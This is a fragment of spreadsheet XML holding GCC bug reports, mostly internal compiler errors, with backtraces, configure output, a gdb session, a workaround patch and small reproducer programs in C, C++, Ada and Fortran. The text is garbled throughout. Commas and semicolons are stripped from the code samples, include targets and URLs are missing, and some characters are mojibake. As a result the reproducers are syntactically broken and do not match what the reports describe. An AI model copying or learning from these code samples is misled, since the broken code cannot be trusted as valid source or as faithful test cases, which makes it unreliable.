        ../../gcc/builtins.c:4819
0x72f443 expand_builtin(tree_node* rtx_def* rtx_def* machine_mode int)
        ../../gcc/builtins.c:7115
0x8352d8 expand_expr_real_1(tree_node* rtx_def* machine_mode expand_modifier rtx_def** bool)
        ../../gcc/expr.c:10851
0x749f8c expand_expr
        ../../gcc/expr.h:276
0x749f8c expand_call_stmt
        ../../gcc/cfgexpand.c:2673
0x749f8c expand_gimple_stmt_1
        ../../gcc/cfgexpand.c:3607
0x749f8c expand_gimple_stmt
        ../../gcc/cfgexpand.c:3773
0x74b0d3 expand_gimple_basic_block
        ../../gcc/cfgexpand.c:5772
0x7503d6 execute
        ../../gcc/cfgexpand.c:6373</t>
  </si>
  <si>
    <t>GCC-58804</t>
  </si>
  <si>
    <t>dynamic_bitset uses popcountl on long long</t>
  </si>
  <si>
    <t>tr2/dynamic_biset/pr58729 fails on targets where long long is bigger than long.</t>
  </si>
  <si>
    <t>GCC-72775</t>
  </si>
  <si>
    <t>[6 Regression] internal compiler error: in finish_expr_stmt at cp/semantics.c:677</t>
  </si>
  <si>
    <t>Since r233183 we ICE with:
class S {
  bool b
  char a[] = foo
  S () {}
}
$ ./cc1plus -quiet q.cc
q.cc: In constructor â€˜S::S()â€™:
q.cc:4:8: internal compiler error: in finish_expr_stmt at cp/semantics.c:677
   S () {}
        ^
0x9b904c finish_expr_stmt(tree_node*)
	/home/marek/src/gcc/gcc/cp/semantics.c:677
0x98ed5a perform_member_init
	/home/marek/src/gcc/gcc/cp/init.c:803
0x990727 emit_mem_initializers(tree_node*)
	/home/marek/src/gcc/gcc/cp/init.c:1179
0x9bc39a finish_mem_initializers(tree_node*)
	/home/marek/src/gcc/gcc/cp/semantics.c:1627
0x90c782 cp_parser_ctor_initializer_opt
	/home/marek/src/gcc/gcc/cp/parser.c:13491
0x919f06 cp_parser_ctor_initializer_opt_and_function_body
	/home/marek/src/gcc/gcc/cp/parser.c:20764
0x922f70 cp_parser_function_definition_after_declarator
	/home/marek/src/gcc/gcc/cp/parser.c:25475
0x92556b cp_parser_late_parsing_for_member
	/home/marek/src/gcc/gcc/cp/parser.c:26354
0x91bf8d cp_parser_class_specifier_1
	/home/marek/src/gcc/gcc/cp/parser.c:21630
0x91c06a cp_parser_class_specifier
	/home/marek/src/gcc/gcc/cp/parser.c:21656
0x9108e2 cp_parser_type_specifier
	/home/marek/src/gcc/gcc/cp/parser.c:15883
0x90b753 cp_parser_decl_specifier_seq
	/home/marek/src/gcc/gcc/cp/parser.c:12802
0x90ac9e cp_parser_simple_declaration
	/home/marek/src/gcc/gcc/cp/parser.c:12336
0x90ac26 cp_parser_block_declaration
	/home/marek/src/gcc/gcc/cp/parser.c:12283
0x90a9a8 cp_parser_declaration
	/home/marek/src/gcc/gcc/cp/parser.c:12180
0x90a501 cp_parser_declaration_seq_opt
	/home/marek/src/gcc/gcc/cp/parser.c:12059
0x8fa316 cp_parser_translation_unit
	/home/marek/src/gcc/gcc/cp/parser.c:4350
0x948552 c_parse_file()
	/home/marek/src/gcc/gcc/cp/parser.c:37581
0xafbce0 c_common_parse_file()
	/home/marek/src/gcc/gcc/c-family/c-opts.c:1070
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-70613</t>
  </si>
  <si>
    <t>-fabi-version docs don't match implementation</t>
  </si>
  <si>
    <t>In docs/invoke.texi it says that 8 is the highest value for -fabi-version.  In c-family/c-opts.c flag_abi_version gets set to 9.  I see two places that check for abi_version of 9 in cp/class.c.  And one place in cp/decl.c.
At first glance it appears that this is just a documentation bug.  I haven't verified this yet.
Since gcc-5 is the first version that defaults to -fabi-version=0 we really should get the -fabi-version docs correct.</t>
  </si>
  <si>
    <t>GCC-36518</t>
  </si>
  <si>
    <t>libgfortran: warning: format '%d' expects type 'int' but</t>
  </si>
  <si>
    <t>I get the following warnings when building libgfortran.
I think they should be fixed and libgfortran should be build with -Werror.
generated/all_l1.c:142: warning: format '%d' expects type 'int' but argument 2 has type 'index_type'
generated/all_l2.c:142: warning: format '%d' expects type 'int' but argument 2 has type 'index_type'
generated/all_l4.c:142: warning: format '%d' expects type 'int' but argument 2 has type 'index_type'
generated/all_l8.c:142: warning: format '%d' expects type 'int' but argument 2 has type 'index_type'
generated/all_l16.c:142: warning: format '%d' expects type 'int' but argument 2 has type 'index_type'
generated/any_l1.c:142: warning: format '%d' expects type 'int' but argument 2 has type 'index_type'
generated/any_l2.c:142: warning: format '%d' expects type 'int' but argument 2 has type 'index_type'
generated/any_l4.c:142: warning: format '%d' expects type 'int' but argument 2 has type 'index_type'
generated/any_l8.c:142: warning: format '%d' expects type 'int' but argument 2 has type 'index_type'
generated/any_l16.c:142: warning: format '%d' expects type 'int' but argument 2 has type 'index_type'
generated/count_1_l.c:142: warning: format '%d' expects type 'int' but argument 2 has type 'index_type'
generated/count_2_l.c:142: warning: format '%d' expects type 'int' but argument 2 has type 'index_type'
generated/count_4_l.c:142: warning: format '%d' expects type 'int' but argument 2 has type 'index_type'
generated/count_8_l.c:142: warning: format '%d' expects type 'int' but argument 2 has type 'index_type'
generated/count_16_l.c:142: warning: format '%d' expects type 'int' but argument 2 has type 'index_type'</t>
  </si>
  <si>
    <t>GCC-2326</t>
  </si>
  <si>
    <t>name lookup regression</t>
  </si>
  <si>
    <t>The following code compiles with 2.95.2.  Fails with
2.96 and fails on 3.00 on  head today.
Release:
g++2.96
Environment:
red hat 7.0 with latest gcc updates.
gcc version 2.96 20000731 (Red Hat Linux 7.0</t>
  </si>
  <si>
    <t>GCC-82445</t>
  </si>
  <si>
    <t>ARM target generates unaligned STRD instruction</t>
  </si>
  <si>
    <t>Created attachment 42310
Reproducer
The 32-bit ARM target in gcc generates an STRD instruction at not-multiple-of-8 offsets even with -no-unaligned-access specified. This currently breaks grub on ARM as it runs with alignment faults enabled.
This is also a regression introduced somewhere recently (gcc7?) as I haven't seen these unaligned accesses generated before.
I've also attached a small reproducer for the issue.</t>
  </si>
  <si>
    <t>agraf</t>
  </si>
  <si>
    <t>GCC-33988</t>
  </si>
  <si>
    <t>Warning when converting between C compatible pointers</t>
  </si>
  <si>
    <t>The RM95 B.3.1 contains: The type chars_ptr is C-compatible and
corresponds to the use of C's ``char *'' for a pointer to the first char
in a char array terminated by nul..
Doesn't it imply that it has a C convention or at least that it can be
converted to an access type with convention C without warranting a
warning? When compiling the following test with GCC trunk and -Wall I get:
t.ads:10:04: warning: conversion between pointers with different conventions
(I know the following code looks strange but it is a specially built
test case following a more complex case found in AdaSockets)
--
with Ada.Unchecked_Conversion
with Interfaces.C.Strings
package T is
   type P is access Integer
   pragma Convention (C P)
   function Convert is
      new Ada.Unchecked_Conversion (Interfaces.C.Strings.chars_ptr P)
end T</t>
  </si>
  <si>
    <t>GCC-44485</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE in get_expr_operands at tree-ssa-operands.c:1020</t>
  </si>
  <si>
    <t>regehr@gamow tmp414]$ current-gcc -v
Using built-in specs.
COLLECT_GCC=current-gcc
COLLECT_LTO_WRAPPER=/uusoc/exports/scratch/regehr/z/compiler-install/gcc-r160490-install/bin/../libexec/gcc/x86_64-unknown-linux-gnu/4.6.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: ../configure --with-libelf=/usr/local --enable-lto --prefix=/home/regehr/z/compiler-install/gcc-r160490-install --program-prefix=r160490- --enable-languages=cc++
Thread model: posix
gcc version 4.6.0 20100609 (experimental) (GCC) 
[regehr@gamow tmp414]$ current-gcc -c -O small.c
small.c: In function 'func_21':
small.c:42:22: warning: assignment makes integer from pointer without a cast [enabled by default]
unhandled expression in get_expr_operands():
small.c: In function 'int324':
small.c:21:6: internal compiler error: in get_expr_operands at tree-ssa-operands.c:1020
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
[regehr@gamow tmp414]$ cat small.c
static int
foo (int si1 int si2)
{
  return si1 &gt; 0 &amp;&amp; si2 &gt; 0 &amp;&amp; si1 &gt; -si2 || si1 &lt; 0 &amp;&amp; si2 &lt; 0
}
struct S0
{
  unsigned short f1
}
int g_4
struct S0 g_54 = {
  3428
}
int
func_21 (int * p_22 int * const int32p_24 unsigned p_25
	 const int * p_26)
void int324 (unsigned p_15 int * p_16 int * p_17 int * p_18)
{
  if (foo (g_4 func_21 (p_18 &amp;g_4 0 0)))
    {
      for (g_54.f1 g_54.f1 g_54.f1 += 1)
	{
	}
    }
}
int
func_21 (int * p_22 int * const int32p_24 unsigned p_25
	 const int * p_26)
{
  for (0 1 p_25 += 1)
  lbl_29:if (p_25)
      goto lbl_28
lbl_28:for (p_25 = 0 p_25 &lt; 9 p_25 += 1)
    if (p_25)
      goto lbl_29
  unsigned short l_53
  for (0 l_53 l_53 = foo)
    {
    }
  return 0
}</t>
  </si>
  <si>
    <t>GCC-14973</t>
  </si>
  <si>
    <t>ICE with -maltivec for vector types not matching HW types</t>
  </si>
  <si>
    <t>The following small testcases cause internal compiler errors when
compiled with -maltivec -mabi=altivec for either -m32 or -m64 for
the current mainline 3.4 and hammer-3.3 branches.  The ICEs differ
but are related so I'm putting these into the same PR.
Output for mainline:
bug1.c: In function `return_v8':
bug1.c:12: error: insn does not satisfy its constraints:
(insn 42 69 26 (set (reg:DI 79 2 [  ])
        (mem:DI (plus:SI (reg/f:SI 31 31)
                (const_int 16 [0x10])) [0 S8 A8])) 321 {*movdi_internal32} (nil)
   (nil))
bug1.c:12: internal compiler error: in final_scan_insn at final.c:2437
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
bug2.c: In function `init_v8':
bug2.c:13: internal compiler error: in simplify_gen_subreg
  at simplify-rtx.c:3665
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
--- bug1 ---------------------------------------------------------------
/* This ICEs when compiled with -maltivec -mabi=altivec for both -m32
   and -m64.  The same thing happens when the integer type is anything
   but 32 bits and also for floating point types that don't fit in HW
   vector registers.  This code is from gcc.dg/compat/vector-1_x.c. */
typedef short __attribute__((vector_size (8))) v8
v8 v
v8 return_v8 (void)
{
    return v
}
--- bug2 ---------------------------------------------------------------
/* This ICEs when compiled with -maltivec -mabi=altivec for both -m32
   and -m64.  The same thing happens when the integer type is anything
   but 32 bits and also for floating point types that don't fit in HW
   vector registers.  This code is from gc.dg/compat/vector-1_y.c.  */
typedef short __attribute__((vector_size (8))) v8
typedef union U8 { v8 v short a[8] } u8
extern v8 v
extern u8 u
void init_v8 (void)
{
    v = u.v
}
------------------------------------------------------------------------</t>
  </si>
  <si>
    <t>GCC-54828</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE in based_loc_descr at dwarf2out.c:10560 with -g -O0</t>
  </si>
  <si>
    <t>Created attachment 28367
Test case
&gt; g++47 -v --save-temps -c TestFault.cc -g
Using built-in specs.
COLLECT_GCC=g++47
Target: x86_64-portbld-freebsd8.2
Configured with: ./../gcc-4.7-20120818/configure --disable-nls --enable-languages=cc++objcfortran --libdir=/usr/local/lib/gcc47 --libexecdir=/usr/local/libexec/gcc47 --program-suffix=47 --with-as=/usr/local/bin/as --with-gmp=/usr/local --with-gxx-include-dir=/usr/local/lib/gcc47/include/c++/ --with-ld=/usr/local/bin/ld --with-libiconv-prefix=/usr/local --with-pkgversion='FreeBSD Ports Collection' --with-system-zlib --enable-languages=cc++objcfortranjava --prefix=/usr/local --mandir=/usr/local/man --infodir=/usr/local/info/gcc47 --build=x86_64-portbld-freebsd8.2
Thread model: posix
gcc version 4.7.2 20120818 (prerelease) (FreeBSD Ports Collection) 
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-c' '-g' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /usr/local/libexec/gcc47/gcc/x86_64-portbld-freebsd8.2/4.7.2/cc1plus -E -quiet -v TestFault.cc -mtune=generic -march=x86-64 -g -fworking-directory -fpch-preprocess -o TestFault.ii
ignoring nonexistent directory /usr/local/lib/gcc47/gcc/x86_64-portbld-freebsd8.2/4.7.2/../../../../../x86_64-portbld-freebsd8.2/include
#include ... search starts here:
#include  search starts here:
 /usr/local/lib/gcc47/include/c++/
 /usr/local/lib/gcc47/include/c++//x86_64-portbld-freebsd8.2
 /usr/local/lib/gcc47/include/c++//backward
 /usr/local/lib/gcc47/gcc/x86_64-portbld-freebsd8.2/4.7.2/include
 /usr/local/include
 /usr/local/lib/gcc47/gcc/x86_64-portbld-freebsd8.2/4.7.2/include-fixed
 /usr/include
End of search list.
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-c' '-g' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /usr/local/libexec/gcc47/gcc/x86_64-portbld-freebsd8.2/4.7.2/cc1plus -fpreprocessed TestFault.ii -quiet -dumpbase TestFault.cc -mtune=generic -march=x86-64 -auxbase TestFault -g -version -o TestFault.s
GNU C++ (FreeBSD Ports Collection) version 4.7.2 20120818 (prerelease) (x86_64-portbld-freebsd8.2)
        compiled by GNU C version 4.7.2 20120818 (prerelease) GMP version 5.0.1 MPFR version 3.0.0 MPC version 0.8.2
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
GNU C++ (FreeBSD Ports Collection) version 4.7.2 20120818 (prerelease) (x86_64-portbld-freebsd8.2)
        compiled by GNU C version 4.7.2 20120818 (prerelease) GMP version 5.0.1 MPFR version 3.0.0 MPC version 0.8.2
GGC heuristics: --param ggc-min-expand=100 --param ggc-min-heapsize=131072
Compiler executable checksum: bd38cbf26a83e7a65b138cf0b63e68eb
TestFault.cc: In constructor 'Foo::Foo()':
TestFault.cc:12:1: internal compiler error: Segmentation fault: 11
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Test case is attached.  4.7.2 release also segfaults in the same way.  4.5.3.20110203 and 4.6.2.20110909 do not.
Enabling optimization prevents the crash.  The stack trace is below.  The 'cfun' global variable is NULL when the fault occurs.  It is set to NULL in dwarf2out_abstract_function() via push_cfun() because DECL_STRUCT_FUNCTION(decl) is NULL (verified by running cc1plus under gdb).
I am using the following hackish patch as a temporary workaround:
--- gcc/dwarf2out.c.orig        2012-10-05 13:11:57.000000000 -0400
+++ gcc/dwarf2out.c     2012-10-05 13:27:32.000000000 -0400
@@ -170466 +1704610 @@
     /* We've already generated the abstract instance.  */
     return
+  /* XXX: Workaround that probably isn't correct. */
+  if (DECL_STRUCT_FUNCTION(decl) == NULL)
+    return
+
   /* We can be called while recursively when seeing block defining inlined subroutine
      DIE.  Be sure to not clobber the outer location table nor use it or we would
      get locations in abstract instantces.  */
GDB info:
Program terminated with signal 6 Aborted.
#0  0x0000000801c8e52c in kill () from /lib/libc.so.7
(gdb) where
#0  0x0000000801c8e52c in kill () from /lib/libc.so.7
#1  0x0000000801c8d32b in abort () from /lib/libc.so.7
#2  0x0000000000c92d45 in real_abort () at .././../gcc-4.7-20120818/gcc/diagnostic.c:909
#3  diagnostic_action_after_output (context=context@entry=0x13c3c80 diagnostic=)
    at .././../gcc-4.7-20120818/gcc/diagnostic.c:216
#4  0x0000000000c92efe in diagnostic_report_diagnostic (context=0x13c3c80 diagnostic=diagnostic@entry=0x7fffffffc920) at .././../gcc-4.7-20120818/gcc/diagnostic.c:552
#5  0x0000000000c93bf0 in internal_error (gmsgid=) at .././../gcc-4.7-20120818/gcc/diagnostic.c:845
#6  0x00000000008476e0 in crash_signal (signo=11) at .././../gcc-4.7-20120818/gcc/toplev.c:346
#7  
#8  based_loc_descr (reg=reg@entry=0x8020014a0 offset=-16 initialized=VAR_INIT_STATUS_INITIALIZED) at .././../gcc-4.7-20120818/gcc/dwarf2out.c:10560
#9  0x00000000006963bf in mem_loc_descriptor (rtl=0x80f00d4f8 mode=DImode mem_mode=mem_mode@entry=DImode initialized=initialized@entry=VAR_INIT_STATUS_INITIALIZED)
    at .././../gcc-4.7-20120818/gcc/dwarf2out.c:11948
#10 0x000000000069b6d1 in loc_descriptor (rtl=rtl@entry=0x80eec50f0 mode=mode@entry=VOIDmode initialized=initialized@entry=VAR_INIT_STATUS_INITIALIZED)
    at .././../gcc-4.7-20120818/gcc/dwarf2out.c:12605
#11 0x000000000069a9d3 in loc_list_from_tree (loc=loc@entry=0x80e0f9280 want_address=want_address@entry=2) at .././../gcc-4.7-20120818/gcc/dwarf2out.c:13592
#12 0x000000000069ab5f in add_bound_info (subrange_die=subrange_die@entry=0x80f0189b0 bound_attr=bound_attr@entry=DW_AT_upper_bound bound=bound@entry=0x80e0f9280)
    at .././../gcc-4.7-20120818/gcc/dwarf2out.c:15656
#13 0x000000000069eadc in add_subscript_info (collapse_p= type= type_die=) at .././../gcc-4.7-20120818/gcc/dwarf2out.c:15745
#14 gen_array_type_die (type=0x80b493a80 context_die=0x80f0188c0) at .././../gcc-4.7-20120818/gcc/dwarf2out.c:16460
#15 0x000000000068cf05 in gen_type_die_with_usage (type=0x80b493a80 context_die=context_die@entry=0x80f0188c0 usage=usage@entry=DINFO_USAGE_DIR_USE)
    at .././../gcc-4.7-20120818/gcc/dwarf2out.c:19057
#16 0x000000000068d28a in gen_type_die (type= context_die=context_die@entry=0x80f0188c0) at .././../gcc-4.7-20120818/gcc/dwarf2out.c:19103
#17 0x000000000069196a in gen_decl_die (decl=0x80b489e60 origin=0x0 context_die=0x80f0188c0) at .././../gcc-4.7-20120818/gcc/dwarf2out.c:19647
#18 0x000000000068eee5 in decls_for_scope (stmt=stmt@entry=0x80b745460 context_die=context_die@entry=0x80f0188c0 depth=depth@entry=2)
    at .././../gcc-4.7-20120818/gcc/dwarf2out.c:19237
#19 0x000000000069f0f2 in gen_lexical_block_die (depth=2 context_die= stmt=0x80b745460) at .././../gcc-4.7-20120818/gcc/dwarf2out.c:18222
#20 gen_block_die (stmt=stmt@entry=0x80b745460 context_die=context_die@entry=0x80f018730 depth=depth@entry=2) at .././../gcc-4.7-20120818/gcc/dwarf2out.c:19187
#21 0x000000000068ef4e in decls_for_scope (stmt=stmt@entry=0x80b7454b0 context_die=context_die@entry=0x80f018730 depth=depth@entry=1)
    at .././../gcc-4.7-20120818/gcc/dwarf2out.c:19251
#22 0x000000000069f0f2 in gen_lexical_block_die (depth=1 context_die= stmt=0x80b7454b0) at .././../gcc-4.7-20120818/gcc/dwarf2out.c:18222
#23 gen_block_die (stmt=stmt@entry=0x80b7454b0 context_die=context_die@entry=0x80f0185f0 depth=depth@entry=1) at .././../gcc-4.7-20120818/gcc/dwarf2out.c:19187
#24 0x000000000068ef4e in decls_for_scope (stmt=stmt@entry=0x80b745500 context_die=context_die@entry=0x80f0185f0 depth=depth@entry=0)
    at .././../gcc-4.7-20120818/gcc/dwarf2out.c:19251
#25 0x000000000068f434 in gen_subprogram_die (decl=decl@entry=0x808ea6800 context_die=context_die@entry=0x80202e000) at .././../gcc-4.7-20120818/gcc/dwarf2out.c:17666
#26 0x0000000000691bda in gen_decl_die (decl=decl@entry=0x808ea6800 origin= origin@entry=0x0 context_die=0x80202e000)
    at .././../gcc-4.7-20120818/gcc/dwarf2out.c:19601
#27 0x000000000068be5b in dwarf2out_decl (decl=decl@entry=0x808ea6800) at .././../gcc-4.7-20120818/gcc/dwarf2out.c:19977
#28 0x000000000068c0ec in dwarf2out_abstract_function (decl=0x808ea6800) at .././../gcc-4.7-20120818/gcc/dwarf2out.c:17080
#29 0x0000000000691e1b in gen_decl_die (decl=0x808f73c00 origin=origin@entry=0x0 context_die=0x80202e000) at .././../gcc-4.7-20120818/gcc/dwarf2out.c:19558
#30 0x000000000068be5b in dwarf2out_decl (decl=) at .././../gcc-4.7-20120818/gcc/dwarf2out.c:19977
#31 0x00000000006a1e39 in dwarf2out_function_decl (decl=) at .././../gcc-4.7-20120818/gcc/dwarf2out.c:19985
#32 0x00000000006d6c3d in rest_of_handle_final () at .././../gcc-4.7-20120818/gcc/final.c:4350
#33 0x00000000007b8638 in execute_one_pass (pass=pass@entry=0x1258fa0) at .././../gcc-4.7-20120818/gcc/passes.c:2084
#34 0x00000000007b8981 in execute_pass_list (pass=0x1258fa0) at .././../gcc-4.7-20120818/gcc/passes.c:2139
#35 0x00000000007b8993 in execute_pass_list (pass=0x1259d40) at .././../gcc-4.7-20120818/gcc/passes.c:2140
#36 0x00000000007b8993 in execute_pass_list (pass=0x1259da0) at .././../gcc-4.7-20120818/gcc/passes.c:2140
#37 0x000000000088e609 in tree_rest_of_compilation (fndecl=0x808f73c00) at .././../gcc-4.7-20120818/gcc/tree-optimize.c:422
#38 0x000000000064764a in cgraph_expand_function (node=0x80b74e480) at .././../gcc-4.7-20120818/gcc/cgraphunit.c:1837
#39 0x0000000000649022 in cgraph_output_in_order () at .././../gcc-4.7-20120818/gcc/cgraphunit.c:2002
#40 cgraph_optimize () at .././../gcc-4.7-20120818/gcc/cgraphunit.c:2213
#41 0x00000000006492aa in cgraph_finalize_compilation_unit () at .././../gcc-4.7-20120818/gcc/cgraphunit.c:1344
#42 0x000000000052b0cb in cp_write_global_declarations () at .././../gcc-4.7-20120818/gcc/cp/decl2.c:4057
#43 0x0000000000849257 in compile_file () at .././../gcc-4.7-20120818/gcc/toplev.c:573
#44 do_compile () at .././../gcc-4.7-20120818/gcc/toplev.c:1938
#45 toplev_main (argc=44 argv=0x7fffffffda10) at .././../gcc-4.7-20120818/gcc/toplev.c:2014
#46 0x00000000004cde4e in _start ()
(gdb) frame 8
#8  based_loc_descr (reg=reg@entry=0x8020014a0 offset=-16 initialized=VAR_INIT_STATUS_INITIALIZED) at .././../gcc-4.7-20120818/gcc/dwarf2out.c:10560
10560     dw_fde_ref fde = cfun-&gt;fde
(gdb) p cfun
$1 = (function *) 0x0
(gdb) frame 28
#28 0x000000000068c0ec in dwarf2out_abstract_function (decl=0x808ea6800) at .././../gcc-4.7-20120818/gcc/dwarf2out.c:17080
17080     dwarf2out_decl (decl)
(gdb) p decl-&gt;function_decl.f
$3 = (function *) 0x0
(gdb) l
17075     current_function_decl = decl
17076     push_cfun (DECL_STRUCT_FUNCTION (decl))
17077
17078     was_abstract = DECL_ABSTRACT (decl)
17079     set_decl_abstract_flags (decl 1)
17080     dwarf2out_decl (decl)
17081     if (! was_abstract)
17082       set_decl_abstract_flags (decl 0)
17083
17084     current_function_decl = save_fn</t>
  </si>
  <si>
    <t>jhb</t>
  </si>
  <si>
    <t>GCC-69544</t>
  </si>
  <si>
    <t>[5/6/7 Regression] Internal compiler error with -Wall and where</t>
  </si>
  <si>
    <t>Adding -Wall causes a compiler error on code that compiles okay without -Wall. See example:
$ cat where_ice.f90 
   subroutine where_ice (ij)
!
   implicit none
!
   integer parameter :: n = 10
   real(4)       :: x(nn2)
   character(8)  :: y(nn2)
!
   integer       :: i
   integer       :: j
   real(4)       :: arr(n)
!
   character(12) :: txt(5)
!
   where (arr(1:9) &gt; -1.e+6)  x(1:9ij) = arr(1:9)
   where (txt(1:3) /= ''   )  y(1:3ij) = txt(1:3)
!
   end subroutine where_ice
$ gfortran -c where_ice.f90 
$ gfortran -Wall -c where_ice.f90 
in gfc_format_decoder at fortran/error.c:1121
0x5e0fae gfc_format_decoder
	/home/joshua2/opt/gcc/linux-64/gcc-5.1.0-src/gcc/fortran/error.c:1121
0x10479bf pp_format(pretty_printer* text_info*)
	/home/joshua2/opt/gcc/linux-64/gcc-5.1.0-src/gcc/pretty-print.c:613
0x1044d7d diagnostic_report_diagnostic(diagnostic_context* diagnostic_info*)
	/home/joshua2/opt/gcc/linux-64/gcc-5.1.0-src/gcc/diagnostic.c:865
0x5e260a gfc_warning_now(int char const* ...)
	/home/joshua2/opt/gcc/linux-64/gcc-5.1.0-src/gcc/fortran/error.c:1244
0x644997 resolve_ordinary_assign
	/home/joshua2/opt/gcc/linux-64/gcc-5.1.0-src/gcc/fortran/resolve.c:9367
0x644997 gfc_resolve_code(gfc_code* gfc_namespace*)
	/home/joshua2/opt/gcc/linux-64/gcc-5.1.0-src/gcc/fortran/resolve.c:10182
0x642157 gfc_resolve_blocks(gfc_code* gfc_namespace*)
	/home/joshua2/opt/gcc/linux-64/gcc-5.1.0-src/gcc/fortran/resolve.c:9254
0x64243c gfc_resolve_code(gfc_code* gfc_namespace*)
	/home/joshua2/opt/gcc/linux-64/gcc-5.1.0-src/gcc/fortran/resolve.c:10081
0x644d92 resolve_codes
	/home/joshua2/opt/gcc/linux-64/gcc-5.1.0-src/gcc/fortran/resolve.c:15055
0x644e72 gfc_resolve(gfc_namespace*)
	/home/joshua2/opt/gcc/linux-64/gcc-5.1.0-src/gcc/fortran/resolve.c:15083
0x63081a resolve_all_program_units
	/home/joshua2/opt/gcc/linux-64/gcc-5.1.0-src/gcc/fortran/parse.c:5280
0x63081a gfc_parse_file()
	/home/joshua2/opt/gcc/linux-64/gcc-5.1.0-src/gcc/fortran/parse.c:5523
0x670355 gfc_be_parse_file
	/home/joshua2/opt/gcc/linux-64/gcc-5.1.0-src/gcc/fortran/f95-lang.c:228
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ gfortran -v
Using built-in specs.
COLLECT_GCC=gfortran
COLLECT_LTO_WRAPPER=/home/joshua2/opt/gcc/linux-64/gcc-5.1.0/libexec/gcc/x86_64-unknown-linux-gnu/5.1.0/lto-wrapper
Target: x86_64-unknown-linux-gnu
Configured with: /home/joshua2/opt/gcc/linux-64/gcc-5.1.0-src/configure --prefix=/home/joshua2/opt/gcc/linux-64/gcc-5.1.0
Thread model: posix
gcc version 5.1.0 (GCC)</t>
  </si>
  <si>
    <t>joshuahykes</t>
  </si>
  <si>
    <t>GCC-10405</t>
  </si>
  <si>
    <t>[3.3/3.4 regression] Segfault in setup_class_bindings</t>
  </si>
  <si>
    <t xml:space="preserve">
Release:
3.3/mainline
Environment:
x86_64-unknown-linux x86 linux
How-To-Repeat:
cc1plus -quiet -v -I. -I. -I.. -I./../headers -I./.. -I./../files -I./../imagewin -I./../shapes -I./../objs -I./../audio -I./../conf -I./../usecode -I./../data -I/usr/include/SDL -I/opt/gnome/include -MD qq.d -MF .deps/Actor_gump.Tpo -MP -MT Actor_gump.lo -D__GNUC__=3 -D__GNUC_MINOR__=3 -D__GNUC_PATCHLEVEL__=0 -D_GNU_SOURCE -DHAVE_CONFIG_H -D_REENTRANT -DXWIN qq.cc -D__GNUG__=3 -quiet -dumpbase qq.cc -auxbase qq -O2 -O2 -Wno-long-long 
Does not reproduce when file is passed as preprocessed file.  Reproduce on original source (exult)</t>
  </si>
  <si>
    <t>GCC-3789</t>
  </si>
  <si>
    <t>missing -liconv</t>
  </si>
  <si>
    <t>Linking fails because sparc-sun-solaris2.6/libjava/Makefile fails to link to libiconv.
Release:
3.0.1 20010716 (prerelease)
Environment:
System: SunOS lismore.dcs.ed.ac.uk 5.6 Generic_111435-01 sun4u sparc SUNWUltra-
5_10
Architecture: sun4
host: sparc-sun-solaris2.6
build: sparc-sun-solaris2.6
target: sparc-sun-solaris2.6
configured with: ./configure --prefix=/home/chrb/big3/distfiles/ : (reconfigured
) ./configure --prefix=/home/chrb/big3/distfiles/ --with-gnu-as --with-gnu-ld
How-To-Repeat:
gmake all</t>
  </si>
  <si>
    <t>chrb</t>
  </si>
  <si>
    <t>GCC-48939</t>
  </si>
  <si>
    <t>ICE in code involving procedure pointers</t>
  </si>
  <si>
    <t>Created attachment 24216
Source code for ICE-causing module
The attached module source code causes an Internal Compiler Error during compilation (gfortran -c gfortran_ice.f90). I'm guessing this might have something to do with the use of procedure pointers.
This is on OS X 10.6.7 with gfortran 4.6.1 (20110325) built within macports.</t>
  </si>
  <si>
    <t>GCC-3088</t>
  </si>
  <si>
    <t>GCC crash while compiling large c++ file.</t>
  </si>
  <si>
    <t xml:space="preserve"> GCC c++ compiler crash while compiling file below.
Release:
3.0 20010608 (prerelease)
Environment:
System: Linux kgardas-ws 2.4.2 #1 Wed Mar 14 09:32:21 CET 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --enable-shared --enable-threads --enable-languages=c++
How-To-Repeat:
command: c++ -save-temps -I../include -O  -fpermissive  -I/opt/mico/include -I/usr/local/include -DPIC -fPIC  -c orb.cc -o orb.pic.o
Preprocessed output:
See attachments for orb.ii.bz2
</t>
  </si>
  <si>
    <t>GCC-66310</t>
  </si>
  <si>
    <t>Problems with intrinsic repeat for large number of copies</t>
  </si>
  <si>
    <t>This small program compiles without any message (gfortran 5.1.1 4.9.0 4.8.3)
   program p
      character :: z = 'z'
      print * repeat(z huge(1_4))
   end
but running the binary ./a.out yields (e.g. with 5.1.1 on SUSE Linux 13.2 64 bit) :
Program received signal SIGSEGV: Segmentation fault - invalid memory reference.
Adding a parameter attribute to above source
   program p
      character parameter :: z = 'z'
      print * repeat(z huge(1_4))
   end
then compilation aborts with :
f951: out of memory allocating 18446744065119617024 bytes after a total of 425984 bytes
The requested memory is about 2^64 bytes and much too large.
huge(1_4) is 2147483647.
Remarks :
The relevant ulimits of the system were unlimited.
The amount of free RAM was much larger than 2 GB.</t>
  </si>
  <si>
    <t>GCC-23126</t>
  </si>
  <si>
    <t>[4.1 Regression] VRP propagates abs incorrectly</t>
  </si>
  <si>
    <t>VRP miscompiles the following testcase at -O2:
#include 
void test(int x)
{
        if (x &lt; -3)
                abort()
        if (x &gt; 5)
                abort()
        if (abs(x) != 1)
                abort()
}
int main()
{
        test(1)
        test(-1)
        return 0
}
The t27.vrp dump shows the problem:
...
x_1: VARYING
D.1823_2: [3 5]  EQUIVALENCES: { } (0 elements)
x_3: [-3 5]  EQUIVALENCES: { x_1 x_4 } (2 elements)
x_4: [-3 +INF]  EQUIVALENCES: { x_1 } (1 elements)
Folding predicate D.1823_2 != 1 to 1
...
